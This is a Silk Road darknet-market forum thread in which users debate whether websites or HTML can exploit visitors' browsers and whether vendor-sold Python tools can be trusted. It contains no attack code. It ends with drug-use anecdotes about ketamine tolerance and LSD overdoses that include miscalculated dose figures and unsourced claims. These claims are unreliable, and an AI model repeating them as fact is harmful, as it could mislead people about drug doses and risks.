Silk Road forums

What are those serverside pieces of code that find their way into the clients main memory/HD? That's a bolt from the blue for pine. I thought something like that would essentially illegal across the board because it could compromise the website itself if a hacker only needed to examine his RAM to extract data about the backend. I guess I took 'serverside' and 'clientside' as statements of fact rather than more general ideas with some caveats/exceptions attached. It's difficult to question literally everything you read or you never get anywhere.

the php code stays on the server but the html files it generates do not. the stylesheets the generated may not. The images on it do not. etc. If you don't have javascript disabled javascript can run on your machine as well. A lot of remote code execution bugs with firefox are linked to font rendering actually. There have been vulnerabilities in the firefox html engine as well, I am not certain but I believe they could be carried out with html only. Actually a little research has made me certain, here is an example of a firefox vulnerability that could be exploited with a specially crafted href http://www.cvedetails.com/cve/CVE-2007-2671/ . It doesn't mention the possibility of remote code execution, only a crash and denial of service, but where there is crashing remote code execution is generally possible. So you are correct that the php code for SR does not run in your memory, but things from SR are indeed present in your computers memory and in some cases on its HD.

HTML can actually be exploited? Ok, now you're scaring me. I take it you mean that if a scripting language was allowed, then it could engineer something like a buffer overflow with the browser's HTML engine or something like that? Because if a bunch of <br> and <span> statements in any order, pattern or magnitude can be used to exploit then you can count me among the terrified. I've heard of images having exploits, but that it was rare, but not about GPG sigs or stuff like that.

Firefoxes HTML engine can be exploited with HTML.  Here is a link about gpg being remotely exploited during signature verification although it is not the example I was thinking of it is the first thing I found about GPG exploits while searching for it http://forums.gentoo.org/viewtopic-p-6848828.html and here is another example of specially crafted signed / encrypted data being used to pwn people who process it through GPG: http://lwn.net/Articles/212909/

To those who think this makes any sense, let me ask you one question. Do you need to download the server side software of SR to your hard drive? No? So how could that possibly exploit you? So you see how ludicrous this statement is.

Well you actually may very well download parts of it to your hard drive depending on your exact browser configuration, but you certainly download it and have it in memory. It can still be used to exploit you, but it requires a lot more skill on the part of the attacker to pwn you through a website than it does to pwn you by getting you to run their malicious program , especially if it is not severely restricted in what it is allowed to do on your system (such as javascript is). In short, going to an pwnt website is probably a lot safer than running malicious.exe (or even .py) (even though it doesn't necessarily have to be, but I think for the sake of pragmatism we can assume that most people here are not using air gaps or properly implemented process isolation).

All that stuff is executed on SR's server, it never touches your machine, so this is completely irrelevant to this discussion. And the information we do download from SR is just HTML and CSS, that in fact is actually open source, just Right Click and select "View Page Source", a webpage just those components cannot contain an exploit for you to worry about because it's not even programming code.

It definitely does touch your machine and can be used to exploit vulnerabilities in your system (likely but not necessarily browser) to take over your system. Well strictly speaking the php code doesn't but what it produces does. Even HTML can be used to pwn people, if there is a remote code execution vulnerability in the browsers HTML engine (as has happened before. In fact even images have had exploits embedded in them for pwning image viewing software that views them....even GPG signatures have had exploits contained in them). Unfortunately I do not know the finer details of how such advanced hacking is carried out, but it is possible. These attacks are extremely rare and  vulnerabilities like this are few and far between, although it was not that long ago I remember reading about a html based exploit against firefox.

And if SR indeed did offer up it's server side code as open source, LE would surely be delighted to examine it for weaknesses.

And they would probably find some. SR should have his code professionally audited too, he is clearly not a security expert. He does know what linux is and what Tor and GPG and bitcoins are though, so he has probably done a less than horrible job at configuring SR, although I wonder how much php experience he has and how much experience he has hardening servers. Someone with no experience hardening servers is extremely likely to make a much easier target than someone who has extensive knowledge on hardening servers, although the OS used will add some level of 'built in' security. Ubuntu is definitely not the best choice he could have gone with, for someone with his apparent level of server hardening I would certainly have suggested that he went with OpenBSD as it is hardened by default and contains preconfigured security solutions with less focus on requiring the person running the server to know how to do a lot of different specialized configurations to lock things down. I also am not sure but I wonder if Apace is default compiled as a position independent executable on Ubuntu....or if he would know how to manually specify it during compile time if it is not, or if he knows what a position independent executable is and how compiling apache as one would benefit security or the hardware requirements to take full advantage of it etc.....

I can see your point, but your faith in the generosity of users is, I suspect, exaggerated.  Your previous suggestion of a developer tip jar would be unlikely to garner more than a few BTC.  I'm basing this opinion on what my experience with PGP Club and GPG instruction in other threads and via PMs.

And simultaneously I don't expect anyone pays for your software. If they are not able to audit it they will have no idea if they can trust it and if they can audit it they would just do it themselves. So in the end you will make more with a tip jar than you would with software that people are either too afraid to run or know how to make themselves.

There's nothing in the GPL which prevents selling the code under that license.  In fact, here's the part of the FAQ which relates to it:

Which might be a valid point, if we were debating about the GPL instead of what is best practice for the people on this forum. As it stands, I couldn't give less of a fuck what license you give the code.

I can understand that concern too and I share it.  There have been calls for SR's source code to be released for similar reasons, but that's not too likely either.

It is completely apples and oranges to compare server and client side code (especially client side code that isn't even contained in a browser). The security implications of SR being run by the feds are far less than the implications of running a python script from the feds.

It's possible to compile Python code as a Windows executable, but that's not what this is.  I did it once years ago and it turned a script that was a few Kb in size into something like 1.5Mb.  Ridiculous.  I'd rather just install Python, if it's not already installed, and run the code.

I've never bothered trying to reverse engineer the bytecode from any of my scripts, but I believe it's usually pretty straight forward.  I think it might be possible to obscure it, but I can't remember because I've never been interested in doing that.

It is possible to make a windows executable out of a Ruby script as well, but it contains the actual script and a ruby interpreter inside of it . I have no real idea, but I wouldn't be surprised if it is the same thing with python. Yeah I also think it is pretty straight forward to reverse engineer bytecode, but I was trying to imagine what a close source python program would look like. I don't know Python but I do know Ruby and even the .exe's contain the source code in them, they are a cheap gimmick that packages an interpreter and the script into a single executable file.

Why did pine fly off the handle and make accusations about LouisCyphre which are seemingly untrue and could potentially stifle new business through his vendor's account ? Very strange indeed! It's not like pine to make such a simple mistake as claiming the software is closed source when clearly it's not.  I feel LouisCyphre has more than adequately posted answers to all questions asked of him. Well done LouisCyphre. 

I still think vendors selling software sets a precedent that we need to be careful about. A lot of good can come from having programmers working to make software to help us become more secure and make our lives easier. In fact, I have some projects of my own that I am working on. At the same time we need to realize that the people here are of course risking very real prison sentences, and that the utmost care must be taken regarding running software from people. I think that the best approach is one of open source publicly audited only. If a vendor knows enough python to audit the code they will make it themselves, so there is no point in anyone who is capable of auditing it paying for it. I don't think that we should have a culture here that promotes haphazardly running code from others, that will certainly lead to people being pwnt and I can very easily see Pines concern, although I also see that she is somewhat fear mongering or at least talking about technical things she doesn't know enough about to make accusations based on (for example claiming a python program is closed source, I don't know if that is even possible, maybe it can be distributed as bytecode or obfuscated, but that is hardly what anyone thinks of when python scripts are mentioned, and it seems she has absolutely nothing to base her claims of this software not being open source on).

My suggestion remains, that people not use software offered by people here, unless it is open source and the code is available for everyone here to audit. I think this is the only way we can create tools for each other to use while not being at risk of malicious activity. I would love to make money from the tools I will hopefully be providing soon, but I realize that nobody in their right mind is going to run code from here unless it is publicly audited, and the people who do are going to end up getting pwnt, be it from Louise or someone else.

Goddamn this thread got huge

that's what she said

is it even possible to make python programs closed source? What is it, bytecode?

k tolerance is completely reversible in my experience, just don't touch it for a month.

there were a couple people in I believe the 60's that did lines of it, thinking it was cocaine....so if they only did a .1g line of it that's like taking 100,000 tabs of acid with 100mcg on them each....they did end up going to the hospital, but I dont think there were any really lasting effects....I could be wrong though, it was a long time ago that I read that article

Some have died from sniffing massive overdoses of LSD crystal, others have lived but got a laundry list of nasty effects including bleeding through their skin. Of course these are doses equal to thousands of hits.